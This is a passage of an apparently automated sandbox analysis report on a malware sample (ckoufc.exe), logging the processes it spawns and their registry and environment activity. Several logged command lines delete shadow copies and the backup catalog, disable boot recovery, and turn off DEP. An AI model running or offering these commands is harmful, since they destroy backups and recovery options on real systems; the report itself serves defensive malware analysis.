Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x7ff92fdee830	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x7ff92fdee300	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40	1	Fn

Environment (19)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #4: cmd.exe

Information	Value
ID	#4
File Name	c:\windows\system32\cmd.exe
Command Line	/C bcdedit /set {default} recoveryenabled no
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:00:55, Reason: Self Terminated
Monitor Duration	00:00:06

OS Process Information

Information	Value
PID	0x770
Parent PID	0x47c (c:\users\fd1hvy\desktop\ckoufc.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x E5C 0x AEC

Host Behavior

File (16)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	8	Fn
Open	STD_INPUT_HANDLE	-	6	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 4, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\system32\bcdedit.exe	os_pid = 0x344, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x7ff7b8240000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x7ff92fdd0000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x7ff92fdea990	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x7ff92fdee830	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x7ff92fdee300	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40	1	Fn

Environment (19)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #5: cmd.exe

Information	Value
ID	#5
File Name	c:\windows\system32\cmd.exe
Command Line	/C wbadmin delete catalog -quiet
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:01:48, Reason: Self Terminated
Monitor Duration	00:00:59

OS Process Information

Information	Value
PID	0x654
Parent PID	0x47c (c:\users\fd1hvy\desktop\ckoufc.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A8C 0x E3C

Host Behavior

File (15)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	8	Fn
Open	STD_INPUT_HANDLE	-	5	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 4, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\system32\wbadmin.exe	os_pid = 0xdb0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x7ff7b8240000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x7ff92fdd0000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x7ff92fdea990	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x7ff92fdee830	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x7ff92fdee300	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40	1	Fn

Environment (19)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #6: cmd.exe

Information	Value
ID	#6
File Name	c:\windows\system32\cmd.exe
Command Line	/C vssadmin.exe delete shadows /all /quiet
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:13

OS Process Information

Information	Value
PID	0xcdc
Parent PID	0x47c (c:\users\fd1hvy\desktop\ckoufc.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x D40 0x F78

Host Behavior

File (15)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Get Info	vssadmin.exe	type = file_attributes	1	Fn
Open	STD_OUTPUT_HANDLE	-	7	Fn
Open	STD_INPUT_HANDLE	-	5	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 4, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\system32\vssadmin.exe	os_pid = 0xdec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x7ff7b8240000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x7ff92fdd0000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x7ff92fdea990	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x7ff92fdee830	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x7ff92fdee300	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40	1	Fn

Environment (19)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000002	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #7: cmd.exe

Information	Value
ID	#7
File Name	c:\windows\system32\cmd.exe
Command Line	/C bcdedit.exe /set {current} nx AlwaysOff
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:00:55, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

Information	Value
PID	0xd24
Parent PID	0x47c (c:\users\fd1hvy\desktop\ckoufc.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x D60 0x 4A8

Host Behavior

File (16)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Get Info	bcdedit.exe	type = file_attributes	1	Fn
Open	STD_OUTPUT_HANDLE	-	8	Fn
Open	STD_INPUT_HANDLE	-	5	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 4, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\system32\bcdedit.exe	os_pid = 0x39c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x7ff7b8240000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x7ff92fdd0000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x7ff92fdea990	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x7ff92fdee830	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x7ff92fdee300	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40	1	Fn

Environment (19)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #8: cmd.exe

Information	Value
ID	#8
File Name	c:\windows\system32\cmd.exe
Command Line	/C wmic SHADOWCOPY DELETE
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:01:32, Reason: Self Terminated
Monitor Duration	00:00:42

OS Process Information

Information	Value
PID	0xd68
Parent PID	0x47c (c:\users\fd1hvy\desktop\ckoufc.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A98 0x EE0

Host Behavior

File (15)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	8	Fn
Open	STD_INPUT_HANDLE	-	5	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 4, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\System32\Wbem\WMIC.exe	os_pid = 0xb84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x7ff7b8240000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x7ff92fdd0000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x7ff92fdea990	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x7ff92fdee830	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x7ff92fdee300	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40	1	Fn

Environment (19)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 80041014	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #9: bcdedit.exe

Information	Value
ID	#9
File Name	c:\windows\system32\bcdedit.exe
Command Line	bcdedit.exe /set {current} nx AlwaysOff
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:52, Reason: Child Process
Unmonitor	End Time: 00:00:55, Reason: Self Terminated
Monitor Duration	00:00:03
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x39c
Parent PID	0xd24 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A60 0x A88

Process #10: wmic.exe

162

Information	Value
ID	#10
File Name	c:\windows\system32\wbem\wmic.exe
Command Line	wmic SHADOWCOPY DELETE
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:52, Reason: Child Process
Unmonitor	End Time: 00:01:31, Reason: Self Terminated
Monitor Duration	00:00:39

OS Process Information

Information	Value
PID	0xb84
Parent PID	0xd68 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
